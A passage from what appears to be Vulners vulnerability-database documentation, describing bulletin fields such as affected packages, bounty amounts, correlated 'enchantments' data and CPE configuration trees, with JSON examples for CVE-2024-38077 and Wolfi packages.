"OSVersion": "unknown",
"arch": "aarch64",
"packageVersion": "0.7.3-r1",
"packageFilename": "apko-0.7.3-r1.apk",
"operator": "le",
"packageName": "apko"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "x86_64",
"packageVersion": "0.6.0-r0",
"packageFilename": "bom-0.6.0-r0.apk",
"operator": "le",
"packageName": "bom"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "aarch64",
"packageVersion": "0.6.0-r0",
"packageFilename": "bom-0.6.0-r0.apk",
"operator": "le",
"packageName": "bom"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "x86_64",
"packageVersion": "0.7.7-r13",
"packageFilename": "ctop-0.7.7-r13.apk",
"operator": "le",
"packageName": "ctop"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "aarch64",
"packageVersion": "0.7.7-r13",
"packageFilename": "ctop-0.7.7-r13.apk",
"operator": "le",
"packageName": "ctop"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "x86_64",
"packageVersion": "3.12.2-r1",
"packageFilename": "helm-3.12.2-r1.apk",
"operator": "le",
"packageName": "helm"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "aarch64",
"packageVersion": "3.12.2-r1",
"packageFilename": "helm-3.12.2-r1.apk",
"operator": "le",
"packageName": "helm"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "x86_64",
"packageVersion": "0.13.0-r3",
"packageFilename": "ko-0.13.0-r3.apk",
"operator": "le",
"packageName": "ko"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "aarch64",
"packageVersion": "0.13.0-r3",
"packageFilename": "ko-0.13.0-r3.apk",
"operator": "le",
"packageName": "ko"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "x86_64",
"packageVersion": "0.3.2-r1",
"packageFilename": "melange-0.3.2-r1.apk",
"operator": "le",
"packageName": "melange"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "aarch64",
"packageVersion": "0.3.2-r1",
"packageFilename": "melange-0.3.2-r1.apk",
"operator": "le",
"packageName": "melange"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "x86_64",
"packageVersion": "0.24.0-r1",
"packageFilename": "up-0.24.0-r1.apk",
"operator": "le",
"packageName": "up"
},
{
"OS": "Wolfi",
"OSVersion": "unknown",
"arch": "aarch64",
"packageVersion": "0.24.0-r1",
"packageFilename": "up-0.24.0-r1.apk",
"operator": "le",
"packageName": "up"
}
]
Example link: CVE-2019-0230
"affectedPackage": [
{
"OS": "ubuntu",
"OSVersion": "Upstream",
"arch": "noarch",
"packageVersion": "any",
"packageFilename": "UNKNOWN",
"operator": "lt",
"packageName": "libstruts1.2-java"
}
]
bounty¶
Specifies the monetary reward offered for responsibly disclosing the vulnerability, typically through platforms like HackerOne. This value represents the bounty amount in a designated currency.
Format: Double
Examples:
"bounty": 1800
"bounty": 200
"bounty": 0
Complex fields¶
Fields in this section are partly provided by the Vulners team and are the results of processing, the logic of which is the responsibility of Vulners.
enchantments¶
A nested structure of additional data that Vulners correlates automatically. This can include references to relevant bulletins, other advisories, or computed scores
-
backreferences: A list of cross-reference objects, pointing back to related bulletins or identifiers (e.g., Debian advisories, Nessus scripts, etc.). Each object specifies a
type
(vendor/source) and anidList
containing the referenced IDs.- references: Include all vulnerabilities, including those awaiting a final vendor status.
-
score:
- value: Vulners' computed risk rating (float).
- uncertanity: Estimated margin of error or confidence measurement (float).
- vector: A textual representation of how the score was computed or a placeholder like
None
.
-
dependencies:
- references: Similar to backreferences, but typically listing forward or lateral references that show how this bulletin depends on or is connected to other items (e.g., CVEs, OS package advisories, etc.).
-
short_description:
- references: A concise summary, frequently added by Vulners (e.g., a one-line statement about the vulnerability).
-
dependencies:
- references: A free-form array of keywords or classifications added by Vulners, helping users filter or group related bulletins.
-
reddit:
- counter: Number of identified Reddit discussions or posts referencing this vulnerability.
- posts: Details about each post referencing the vulnerability.
- link: The direct link to the Reddit thread or comment.
- text: The text snippet or title from the Reddit post.
- author: The Reddit username of the post author.
- author_photo: A link to the author’s profile picture on Reddit (if available).
- date: Timestamp of the Reddit post creation, e.g.
2024-09-19T20:28:59+00:00
.
Type: Object
Examples:
Example: GHSA-232P-VWFF-86MP vulnerabilities
"enchantments": {
"score": {
"value": 7.5,
"uncertanity": 2.2,
"vector": "NONE"
},
"short_description": "Unix package vulnerabilities GHSA-232P-VWFF-86MP",
"tags": [
"unix",
"package vulnerabilities",
"ghsa-232p-vwff-86mp"
]
}
enchantments
object with only three subfields: score
, short_description
, and tags
tailored to a particular vulnerability affecting Unix packages.
Example: CVE-2024-38077
"enchantments": {
"dependencies": {
"references": [
{
"type": "cvelist",
"idList": [
"CVELIST:CVE-2024-38077"
]
},
{
"type": "githubexploit",
"idList": [
"0D6475EB-AC1D-5C3B-A41A-2ECC1FAA8C4B",
"2C119FFA-ECE0-5E14-A4A4-354A2C38071A",
"3489FBF5-57C6-5A23-B197-EE59D0B58F98",
"77D775A2-5E8A-518C-9234-C0710F805EA9",
"7F1831CC-811A-5BB6-9BBD-6BDA7F7B25A0",
"95499236-C9FE-56A6-9D7D-E943A24B633A",
"9AB92EA8-EEB7-56D4-BF9E-6DD0B6ACD821",
"A1D3078B-35AA-51E5-89EB-F9FC2C1FD8B1",
"B6D991E6-25F3-569C-893B-6C6621641095",
"B8A2DE4D-6B57-51DB-8BB4-98E09483A879",
"BB405B1D-EDF4-5F8F-9490-6BA42B63E6D5"
]
},
{
"type": "kaspersky",
"idList": [
"KLA70412",
"KLA70416"
]
},
{
"type": "krebs",
"idList": [
"KREBS:C63E400C1EA9A3532E495B977763FAC6"
]
},
{
"type": "mscve",
"idList": [
"MS:CVE-2024-38077"
]
},
{
"type": "mskb",
"idList": [
"KB5040430",
"KB5040434",
"KB5040437",
"KB5040438",
"KB5040456",
"KB5040485",
"KB5040490",
"KB5040497",
"KB5040498",
"KB5040499"
]
},
{
"type": "nessus",
"idList": [
"SMB_NT_MS24_JUL_5040430.NASL",
"SMB_NT_MS24_JUL_5040434.NASL",
"SMB_NT_MS24_JUL_5040437.NASL",
"SMB_NT_MS24_JUL_5040438.NASL",
"SMB_NT_MS24_JUL_5040456.NASL",
"SMB_NT_MS24_JUL_5040485.NASL",
"SMB_NT_MS24_JUL_5040490.NASL",
"SMB_NT_MS24_JUL_5040498.NASL"
]
},
{
"type": "nvd",
"idList": [
"NVD:CVE-2024-38077"
]
},
{
"type": "openvas",
"idList": [
"OPENVAS:1361412562310834224",
"OPENVAS:1361412562310834225"
]
},
{
"type": "qualysblog",
"idList": [
"QUALYSBLOG:02485EEDF97B0A63D173557872FE29E1"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:AE4755714B9B934B2E6D8F0EB6303813"
]
},
{
"type": "talosblog",
"idList": [
"TALOSBLOG:A48FEC8F50A51EBAA5DA84C75E18E2F5"
]
},
{
"type": "vulnrichment",
"idList": [
"VULNRICHMENT:CVE-2024-38077"
]
}
]
},
"score": {
"value": 9.6,
"uncertanity": 0.1,
"vector": "NONE"
},
"short_description": "Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability CVE-2024-3807",
"tags": [
"windows remote desktop licensing",
"code execution",
"vulnerability"
],
"reddit": {
"counter": 22,
"posts": [
{
"link": "https://blog.0patch.com/2024/09/micropatches-for-madlicense-windows.html",
"text": "Micropatchesfor\"MadLicense\"WindowsRemoteDesktopLicensingServiceRemoteCodeExecution(CVE-2024-38077)areavailablefrom0patch",
"author": "0patch",
"author_photo": "https://styles.redditmedia.com/t5_1d1tsh/styles/profileIcon_4zo1rhshbv2a1.png",
"date": "2024-09-19T20:28:59+00:00"
}
]
}
}
- backreferences > references: Cross-links to Debian, FreeBSD, and so on.
- score: A calculated 9.2 rating with a 0.2 “uncertanity.”
- dependencies > references**: Shows additional correlations (CVE list, specific advisories).
- short_description: A short note about this CVE.
- tags: General classification keywords.
- reddit: Full info extracted from Reddit.
cpeConfigurations¶
Type: Object
This field aggregates product/version applicability in the form of logical AND/OR CPE trees. Currently, it consists of two main arrays: nvdCpeConfiguration
and vulnersCpeConfiguration
.
Structure:
"cpeConfigurations": { "nvdCpeConfiguration": [ … ], "vulnersCpeConfiguration": [ … ] }
nvdCpeConfiguration¶
Type: Array
An array of configuration objects sourced directly from the NVD. Follows the official NVD JSON schema, including nodes
that have:
- operator: Logical operator ("AND", "OR").
- negate: Boolean indicating whether the logic is inverted.
- cpeMatch: An array listing detailed CPE URIs, version boundaries, etc. Each item in
cpeMatch
typically includes:- vulnerable: CPE is vulnerable (
true
/false
). - criteria: Full CPE 2.3 URI (e.g.,
cpe:2.3:o:microsoft:windows_server_2008:*:*:*:*:*:*:*:*
). - matchCriteriaId: NVD’s unique identifier for this entry.
- Optional fields like
versionEndExcluding
,versionStartIncluding
, etc.
- vulnerable: CPE is vulnerable (
"nvdCpeConfiguration": [
{
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*",
"matchCriteriaId": "2127D10C-B6F3-4C1D-B9AA-5D78513CC996"
},
{
"vulnerable": true,
"versionEndExcluding": "10.0.17763.6054",
"criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3401E6F7-2430-4247-8A22-0B733A03501A"
}
]
}
]
}
]
vulnersCpeConfiguration¶
Type: Array
An array of Vulners-generated configurations. It may combine or refine data from multiple sources (including NVD) but often uses a similar nested nodes approach:
- operator: Logical operator ("AND", "OR").
- negate: Boolean indicating whether the logic is inverted.
- cpeMatch: An array listing detailed CPE URIs, version boundaries, etc. Each item in
cpeMatch
typically includes:- vulnerable: CPE is vulnerable (
true
/false
). - criteria: Full CPE 2.3 URI (e.g.,
cpe:2.3:o:microsoft:windows_server_2008:*:*:*:*:*:*:*:*
). - matchCriteriaId: NVD’s unique identifier for this entry.
- Optional fields like
versionEndExcluding
,versionStartIncluding
, etc.
- vulnerable: CPE is vulnerable (
"vulnersCpeConfiguration": [
{
"operator": "OR",
"nodes": [
{
"operator": "OR",
"negate": false,
"cpeMatch": [
{
"vulnerable": true,
"versionEndExcluding": "10.0.17763.6054",
"criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2fd765cec5eb54cbae86c10b59ec5796",
"vectorId": "1:0294c7640c555cb7bd85ec0784536f3f",
"provider": "microsoft"
}
]
}
]
},
// Possibly more objects in this array
]